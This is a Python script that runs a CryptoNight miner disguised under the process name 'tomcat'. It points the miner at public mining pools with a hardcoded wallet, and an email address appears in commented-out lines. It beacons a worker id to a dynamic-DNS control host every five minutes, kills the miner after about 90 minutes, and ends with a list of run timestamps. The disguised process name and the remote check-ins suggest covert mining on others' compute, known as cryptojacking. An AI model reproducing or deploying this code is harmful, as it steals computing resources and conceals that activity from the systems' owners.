import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:04.257903
#2018-02-17 16:56:06.051627
#2018-02-17 18:46:05.406240
#2018-02-17 20:35:07.959849
#2018-02-17 22:21:05.674869
#2018-02-18 00:05:06.600938
#2018-02-18 01:56:07.293656
#2018-02-18 03:44:03.638232
#2018-02-18 05:32:01.899651
#2018-02-18 07:23:07.170033
#2018-02-18 09:11:06.603879
#2018-02-18 10:57:07.597372
#2018-02-18 12:43:06.006791
#2018-02-18 14:30:07.545813
#2018-02-18 16:20:05.645072
#2018-02-18 18:08:06.764766
#2018-02-18 19:53:06.335801
#2018-02-18 21:40:08.220538
#2018-02-18 23:28:07.168253
#2018-02-19 01:15:08.971993
#2018-02-19 03:03:06.060967
#2018-02-19 04:50:08.559750
#2018-02-19 06:35:08.751220
#2018-02-19 08:24:01.778716
#2018-02-19 10:14:05.793171
#2018-02-19 12:02:01.258635
#2018-02-19 13:48:09.191636
#2018-02-19 15:38:07.876247
#2018-02-19 17:25:06.847902
#2018-02-19 19:13:08.950244
#2018-02-19 21:02:05.204107
#2018-02-19 22:50:03.033230
#2018-02-20 00:33:01.964641
#2018-02-20 02:23:06.819265
#2018-02-20 04:13:01.549291
#2018-02-20 05:56:01.988567
#2018-02-20 07:42:05.727556
#2018-02-20 09:27:06.673078
#2018-02-20 11:11:05.943772
#2018-02-20 12:58:01.927605
#2018-02-20 14:44:01.959242
#2018-02-20 16:29:08.048639
#2018-02-20 18:17:08.763538
#2018-02-20 20:07:04.972303
#2018-02-20 21:55:01.604824
#2018-02-20 23:38:05.621679
#2018-02-21 01:22:04.125817
#2018-02-21 03:09:06.517033
#2018-02-21 04:56:06.738788
#2018-02-21 06:44:01.461897
#2018-02-21 08:33:04.847817
#2018-02-21 10:20:10.644333
#2018-02-21 12:09:08.190147
#2018-02-21 13:58:09.840132
#2018-02-21 15:43:07.946167
#2018-02-21 17:35:07.664345
#2018-02-21 19:22:09.969437
#2018-02-21 21:11:06.896850
#2018-02-21 23:00:03.442022
#2018-02-22 00:48:05.674416
#2018-02-22 02:35:01.424892
#2018-02-22 04:21:07.557909
#2018-02-22 06:09:06.248510
#2018-02-22 07:54:07.958570
#2018-02-22 09:43:05.569883
#2018-02-22 11:29:04.948972
#2018-02-22 13:16:10.000652
#2018-02-22 15:05:06.759450
#2018-02-22 16:49:01.910627
#2018-02-22 18:38:09.507944
#2018-02-22 20:31:01.599951
#2018-02-22 22:16:04.529217
#2018-02-23 00:04:06.939956
#2018-02-23 01:52:06.565718
#2018-02-23 03:40:10.788584
#2018-02-23 05:25:10.058427
#2018-02-23 07:11:01.528566
#2018-02-23 09:16:06.426416
#2018-02-23 11:23:03.887477
#2018-02-23 13:13:06.094343
#2018-02-23 14:58:06.396013
#2018-02-23 16:46:08.691394
#2018-02-23 18:32:07.367529
#2018-02-23 20:21:06.954976
#2018-02-23 22:08:05.652209
#2018-02-23 23:57:03.591386
#2018-02-24 01:48:08.353416
#2018-02-24 03:41:06.536407
#2018-02-24 05:24:06.509676
#2018-02-24 07:12:05.328822
#2018-02-24 09:03:02.077925
#2018-02-24 11:02:07.729907
#2018-02-24 12:51:05.626301
#2018-02-24 14:39:06.526901
#2018-02-24 16:29:01.598185
#2018-02-24 18:20:05.088410
#2018-02-24 20:07:02.039074
#2018-02-24 21:51:01.709051
#2018-02-25 00:50:09.366189
#2018-02-25 03:52:01.460230
#2018-02-25 06:37:05.070782
#2018-02-25 11:36:04.782433
#2018-02-25 13:31:01.281023
#2018-02-25 15:05:01.491796